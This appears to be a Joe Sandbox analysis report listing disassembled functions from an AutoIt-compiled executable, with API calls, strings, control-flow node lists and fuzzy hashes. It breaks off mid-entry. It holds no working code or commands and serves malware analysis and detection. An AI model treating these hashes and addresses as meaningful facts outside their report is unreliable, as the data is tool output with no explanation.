                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                • String ID: Line:
                                                • API String ID: 3942752672-1585850449
                                                • Opcode ID: 74a5c1b5aab24fc1855856504bd1c0e836126166d698b523db3dceaa7d3f65e2
                                                • Instruction ID: 93d17077047cdb2fb92bb2aeb737678b1da5b9c218dada34cb942e657fa85daa
                                                • Opcode Fuzzy Hash: 74a5c1b5aab24fc1855856504bd1c0e836126166d698b523db3dceaa7d3f65e2
                                                • Instruction Fuzzy Hash: 3331B571408704AEDB25EB60DC4ABDB77D8BF84340F10C91EF599921A1EF789A48C796
                                                Function 0079558D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1057 79558d-7955a6 1058 7955a8-7955ad 1057->1058 1059 7955c3 1057->1059 1058->1059 1060 7955af-7955b1 1058->1060 1061 7955c5-7955cb 1059->1061 1062 7955cc-7955d1 1060->1062 1063 7955b3-7955b8 call 798ca8 1060->1063 1064 7955df-7955e3 1062->1064 1065 7955d3-7955dd 1062->1065 1075 7955be call 798f36 1063->1075 1068 7955f3-7955f5 1064->1068 1069 7955e5-7955f0 call 792f60 1064->1069 1065->1064 1067 795603-795612 1065->1067 1073 795619 1067->1073 1074 795614-795617 1067->1074 1068->1063 1072 7955f7-795601 1068->1072 1069->1068 1072->1063 1072->1067 1077 79561e-795623 1073->1077 1074->1077 1075->1059 1079 795629-795630 1077->1079 1080 79570c-79570f 1077->1080 1081 795671-795673 1079->1081 1082 795632-79563a 1079->1082 1080->1061 1083 7956dd-7956de call 7a0d27 1081->1083 1084 795675-795677 1081->1084 1082->1081 1085 79563c 1082->1085 1094 7956e3-7956e7 1083->1094 1087 795679-795681 1084->1087 1088 79569b-7956a6 1084->1088 1089 79573a 1085->1089 1090 795642-795644 1085->1090 1095 795691-795695 1087->1095 1096 795683-79568f 1087->1096 1097 7956a8 1088->1097 1098 7956aa-7956ad 1088->1098 1093 79573e-795747 1089->1093 1091 79564b-795650 1090->1091 1092 795646-795648 1090->1092 1099 795714-795718 1091->1099 1100 795656-79566f call 7a0e48 1091->1100 1092->1091 1093->1061 1094->1093 1101 7956e9-7956ee 1094->1101 1102 795697-795699 1095->1102 1096->1102 1097->1098 1098->1099 1103 7956af-7956bb call 794856 call 7a0fdb 1098->1103 1106 79572a-795735 call 798ca8 1099->1106 1107 79571a-795727 call 792f60 1099->1107 1117 7956d2-7956db 1100->1117 1101->1099 1105 7956f0-795701 1101->1105 1102->1098 1118 7956c0-7956c5 1103->1118 1112 795704-795706 1105->1112 1106->1075 1107->1106 1112->1079 1112->1080 1117->1112 1119 7956cb-7956ce 1118->1119 1120 79574c-795750 1118->1120 1119->1089 1121 7956d0 1119->1121 1120->1093 1121->1117
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                • String ID:
                                                • API String ID: 1559183368-0
                                                • Opcode ID: 85023550e632f3a2e029d8803ad8feb89e05da70391b4bd881aae18f065e9b73
                                                • Instruction ID: c10900e5fd548db1172573a2172547c01b9028e7e547719f5548045afe33e944
                                                • Opcode Fuzzy Hash: 85023550e632f3a2e029d8803ad8feb89e05da70391b4bd881aae18f065e9b73
                                                • Instruction Fuzzy Hash: F651E730A00B15DBDF269FB9E88466E77B2EF41330F248729F835962D1D7799E608B50
                                                Function 007769CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1122 7769ca-7769f1 call 774f3d 1125 7ae38a-7ae39a call 7d9604 1122->1125 1126 7769f7-776a05 call 774f3d 1122->1126 1130 7ae39f-7ae3a1 1125->1130 1126->1125 1131 776a0b-776a11 1126->1131 1132 7ae3a3-7ae3a6 call 774faa 1130->1132 1133 7ae3c0-7ae408 call 790f36 1130->1133 1135 776a17-776a39 call 776bec 1131->1135 1136 7ae3ab-7ae3ba call 7d4339 1131->1136 1132->1136 1141 7ae40a-7ae414 1133->1141 1142 7ae42d 1133->1142 1136->1133 1145 7ae428-7ae429 1141->1145 1146 7ae42f-7ae442 1142->1146 1147 7ae42b 1145->1147 1148 7ae416-7ae425 1145->1148 1149 7ae448 1146->1149 1150 7ae5b9-7ae5bc call 792ed5 1146->1150 1147->1146 1148->1145 1152 7ae44f-7ae452 call 7775e0 1149->1152 1153 7ae5c1-7ae5ca call 774faa 1150->1153 1156 7ae457-7ae479 call 775f12 call 7d7492 1152->1156 1159 7ae5cc-7ae5dc call 777776 call 775efb 1153->1159 1165 7ae47b-7ae488 1156->1165 1166 7ae48d-7ae497 call 7d747c 1156->1166 1173 7ae5e1-7ae611 call 7cfad2 call 790fac call 792ed5 call 774faa 1159->1173 1168 7ae580-7ae590 call 77766f 1165->1168 1175 7ae499-7ae4ac 1166->1175 1176 7ae4b1-7ae4bb call 7d7466 1166->1176 1168->1156 1178 7ae596-7ae5a0 call 7774bd 1168->1178 1173->1159 1175->1168 1185 7ae4cf-7ae4d9 call 775f8a 1176->1185 1186 7ae4bd-7ae4ca 1176->1186 1184 7ae5a5-7ae5b3 1178->1184 1184->1150 1184->1152 1185->1168 1192 7ae4df-7ae4f7 call 7cfa6e 1185->1192 1186->1168 1197 7ae51a-7ae51d 1192->1197 1198 7ae4f9-7ae518 call 777f41 call 775a64 1192->1198 1200 7ae54b-7ae54e 1197->1200 1201 7ae51f-7ae53a call 777f41 call 776999 call 775a64 1197->1201 1221 7ae53b-7ae549 call 775f12 1198->1221 1203 7ae56e-7ae571 call 7d7428 1200->1203 1204 7ae550-7ae559 call 7cf98f 1200->1204 1201->1221 1211 7ae576-7ae57f call 790fac 1203->1211 1204->1173 1214 7ae55f-7ae569 call 790fac 1204->1214 1211->1168 1214->1156 1221->1211
                                                APIs
                                                  • Part of subcall function 00774F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008352F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00774F6F
                                                • _free.LIBCMT ref: 007AE5BC
                                                • _free.LIBCMT ref: 007AE603
                                                  • Part of subcall function 00776BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00776D0D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _free$CurrentDirectoryLibraryLoad
                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                • API String ID: 2861923089-1757145024
                                                • Opcode ID: c19a9837366cee24be47019a0318e6233b779ce9551d472a85acd88814135a7f
                                                • Instruction ID: 28506ce544061bd35489659d0be9fb573edbcb02eaf29b7889acc9120d92f0a6
                                                • Opcode Fuzzy Hash: c19a9837366cee24be47019a0318e6233b779ce9551d472a85acd88814135a7f
                                                • Instruction Fuzzy Hash: D7919E71910219EFCF04EFA4DC959EDB7B8FF49314F14852AF815AB291EB38A914CB90
                                                Function 007735B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1226 7735b0-7735bb 1227 77362f-773631 1226->1227 1228 7735bd-7735c2 1226->1228 1230 773620-773625 1227->1230 1228->1227 1229 7735c4-7735dc RegOpenKeyExW 1228->1229 1229->1227 1231 7735de-7735fd RegQueryValueExW 1229->1231 1232 773614-77361f RegCloseKey 1231->1232 1233 7735ff-77360a 1231->1233 1232->1230 1234 773626-77362d 1233->1234 1235 77360c-77360e 1233->1235 1236 773612 1234->1236 1235->1236 1236->1232
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007735A1,SwapMouseButtons,00000004,?), ref: 007735D4
                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007735A1,SwapMouseButtons,00000004,?,?,?,?,00772754), ref: 007735F5
                                                • RegCloseKey.KERNELBASE(00000000,?,?,007735A1,SwapMouseButtons,00000004,?,?,?,?,00772754), ref: 00773617
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: Control Panel\Mouse
                                                • API String ID: 3677997916-824357125
                                                • Opcode ID: a7fda972b1254426e0647ca646441db08ad2a8e747361711f1f6ef457e0340dd
                                                • Instruction ID: 6302dfecc0cad6760cf1ece2fcb63672befcfbf6dcfb6653469d59d176864a33
                                                • Opcode Fuzzy Hash: a7fda972b1254426e0647ca646441db08ad2a8e747361711f1f6ef457e0340dd
                                                • Instruction Fuzzy Hash: A7114571611218BFDF208F64DC80EBEBBB8EF04780F108469E809D7210EA759E40ABA4
                                                Function 007D9604 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00775045: _fseek.LIBCMT ref: 0077505D
                                                  • Part of subcall function 007D97DD: _wcscmp.LIBCMT ref: 007D98CD
                                                  • Part of subcall function 007D97DD: _wcscmp.LIBCMT ref: 007D98E0
                                                • _free.LIBCMT ref: 007D974B
                                                • _free.LIBCMT ref: 007D9752
                                                • _free.LIBCMT ref: 007D97BD
                                                  • Part of subcall function 00792ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00799BA4), ref: 00792EE9
                                                  • Part of subcall function 00792ED5: GetLastError.KERNEL32(00000000,?,00799BA4), ref: 00792EFB
                                                • _free.LIBCMT ref: 007D97C5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                • String ID:
                                                • API String ID: 1552873950-0
                                                • Opcode ID: a87b705b3ae5ae33e206766d6325fe0730d82beb17e6b297fdaebfaef393be7f
                                                • Instruction ID: 5ee24ef84104b70a1d5efa7bedb46f1806b6113f0cda8daf61e19f7f72dab358
                                                • Opcode Fuzzy Hash: a87b705b3ae5ae33e206766d6325fe0730d82beb17e6b297fdaebfaef393be7f
                                                • Instruction Fuzzy Hash: A8518EB1A04218EFDF249F64DC89A9EBBB9EF48314F04409EB609A3341DB755E80CF58
                                                Function 0079487A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                • String ID:
                                                • API String ID: 2782032738-0
                                                • Opcode ID: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                                                • Instruction ID: 5a75be5a7bfd171fad3df7e960b014b98aa665402c7b6540bd0f0463c55e15de
                                                • Opcode Fuzzy Hash: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                                                • Instruction Fuzzy Hash: 5E410771A047059FDF288E69E880D6F7BA6AF41374B24863DE859C7640E678ED428B40
                                                Function 007773E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 007AED92
                                                • GetOpenFileNameW.COMDLG32(?), ref: 007AEDDC
                                                  • Part of subcall function 007748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007748A1,?,?,007737C0,?), ref: 007748CE
                                                  • Part of subcall function 00790911: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00790930
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                • String ID: X
                                                • API String ID: 3777226403-3081909835
                                                • Opcode ID: ef3a6c2d6a6de31637591ff0afaaa89b51133c0e695e2bab428e5b1a80857d7a
                                                • Instruction ID: e2185241f51a82794b36f88f10b0d9ea76b34de4c74c231823575ed890be9545
                                                • Opcode Fuzzy Hash: ef3a6c2d6a6de31637591ff0afaaa89b51133c0e695e2bab428e5b1a80857d7a
                                                • Instruction Fuzzy Hash: DC219F71A00698DBDF05DB94D849BEE7BF9AF49704F00805AE508A7241DFB85989CFA1
                                                Function 007D8E3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __fread_nolock_memmove
                                                • String ID: EA06
                                                • API String ID: 1988441806-3962188686
                                                • Opcode ID: c3b431fd53d0e4de8617949888bd2391bdf7378134489b88755cd1531f3ef073
                                                • Instruction ID: 856936703f51d08d93b28ac55959a9e5dd8d01ef0a38ec98e905c26345e763da
                                                • Opcode Fuzzy Hash: c3b431fd53d0e4de8617949888bd2391bdf7378134489b88755cd1531f3ef073
                                                • Instruction Fuzzy Hash: 6201BE71904228AEDF15C6A8DC56EEE7BF8DB15701F00459BF552D2181D579A6048B60
                                                Function 007D998C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTempPathW.KERNEL32(00000104,?), ref: 007D99A1
                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007D99B8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Temp$FileNamePath
                                                • String ID: aut
                                                • API String ID: 3285503233-3010740371
                                                • Opcode ID: a3e094a786c8c903d3a1f8d2f106e35e242440c170292d1da638f8a47addd7ba
                                                • Instruction ID: efce4ff74859158dd6f1bf63f539ef1fe10b0f1fda021e46568d6547f7a97971
                                                • Opcode Fuzzy Hash: a3e094a786c8c903d3a1f8d2f106e35e242440c170292d1da638f8a47addd7ba
                                                • Instruction Fuzzy Hash: 1AD05E7994030DBBDB50ABA4EC0EFAA773CFB04700F0082B1FA54D11A1EEB49598CB95
                                                Function 007ECBF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bae65c0e20666bf589e92bc9085129d9e1c794b88886d92e1978792d789bf400
                                                • Instruction ID: f79e6b08fc69066175bdd04bc6dd29bb7335f4063d3554785daa98b6346be93c
                                                • Opcode Fuzzy Hash: bae65c0e20666bf589e92bc9085129d9e1c794b88886d92e1978792d789bf400
                                                • Instruction Fuzzy Hash: 2DF14675608340DFCB24DF29C484A6ABBE5FF88314F14892EF8999B251D734E946CF82
                                                Function 0077F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007902E2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00790313
                                                  • Part of subcall function 007902E2: MapVirtualKeyW.USER32(00000010,00000000), ref: 0079031B
                                                  • Part of subcall function 007902E2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00790326
                                                  • Part of subcall function 007902E2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00790331
                                                  • Part of subcall function 007902E2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00790339
                                                  • Part of subcall function 007902E2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00790341
                                                  • Part of subcall function 00786259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0077FA90), ref: 007862B4
                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0077FB2D
                                                • OleInitialize.OLE32(00000000), ref: 0077FBAA
                                                • CloseHandle.KERNEL32(00000000), ref: 007B4921
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                • String ID:
                                                • API String ID: 1986988660-0
                                                • Opcode ID: 12facc22d95d78a652ee035ea03194f765a4126b835d8cdc9fe0cc2fed47886c
                                                • Instruction ID: 44cf8364cda62f2b896c153e9ae2648d1e7b991311612f9c3aefe6aba83e24cc
                                                • Opcode Fuzzy Hash: 12facc22d95d78a652ee035ea03194f765a4126b835d8cdc9fe0cc2fed47886c
                                                • Instruction Fuzzy Hash: D881CCF0901A40CFC788EF79E849658BBE5FBD9306750892AD119CB362EB744588CF98
                                                Function 007743DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 00774401
                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007744A6
                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007744C3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_$_memset
                                                • String ID:
                                                • API String ID: 1505330794-0
                                                • Opcode ID: 0dc80436a4594ef9bcb6513fdddaba0727ed5884e5346f213d0fd9821047ab08
                                                • Instruction ID: 1109c05ab8f6c7fb5b5293f4f1a9e74ce67c3f4c208b0ff61d0334d0032584c0
                                                • Opcode Fuzzy Hash: 0dc80436a4594ef9bcb6513fdddaba0727ed5884e5346f213d0fd9821047ab08
                                                • Instruction Fuzzy Hash: F0316FB0505741CFDB20DF64D8846ABBBF8FB49348F004D2EF59A83251D779A944DB92
                                                Function 0079588C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • __FF_MSGBANNER.LIBCMT ref: 007958A3
                                                  • Part of subcall function 0079A2EB: __NMSG_WRITE.LIBCMT ref: 0079A312
                                                  • Part of subcall function 0079A2EB: __NMSG_WRITE.LIBCMT ref: 0079A31C
                                                • __NMSG_WRITE.LIBCMT ref: 007958AA
                                                  • Part of subcall function 0079A348: GetModuleFileNameW.KERNEL32(00000000,008333BA,00000104,?,00000001,00000000), ref: 0079A3DA
                                                  • Part of subcall function 0079A348: ___crtMessageBoxW.LIBCMT ref: 0079A488
                                                  • Part of subcall function 0079321F: ___crtCorExitProcess.LIBCMT ref: 00793225
                                                  • Part of subcall function 0079321F: ExitProcess.KERNEL32 ref: 0079322E
                                                  • Part of subcall function 00798CA8: __getptd_noexit.LIBCMT ref: 00798CA8
                                                • RtlAllocateHeap.NTDLL(011F0000,00000000,00000001,00000000,?,?,?,00790F53,?), ref: 007958CF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                • String ID:
                                                • API String ID: 1372826849-0
                                                • Opcode ID: e6403b1764f94d534af2b9b1279a15533b5fd41f6a942eb25c041add6cbef358
                                                • Instruction ID: 09b6b7d20a706b3c02cc0709c476f043c8e6729b6ccad9ebea679c7235576d0f
                                                • Opcode Fuzzy Hash: e6403b1764f94d534af2b9b1279a15533b5fd41f6a942eb25c041add6cbef358
                                                • Instruction Fuzzy Hash: 99019E35251B21EAEE122774FC46E2E7358EF82771B510925F901EA192DE7CAE4047A1
                                                Function 007D994B Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007D95F1,?,?,?,?,?,00000004), ref: 007D9964
                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007D95F1,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007D997A
                                                • CloseHandle.KERNEL32(00000000,?,007D95F1,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007D9981
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleTime
                                                • String ID:
                                                • API String ID: 3397143404-0
                                                • Opcode ID: 7c7c783e3ddbb23735007cd077e63827cf94ccfb6b0e7fbbd34a06c555d4a562
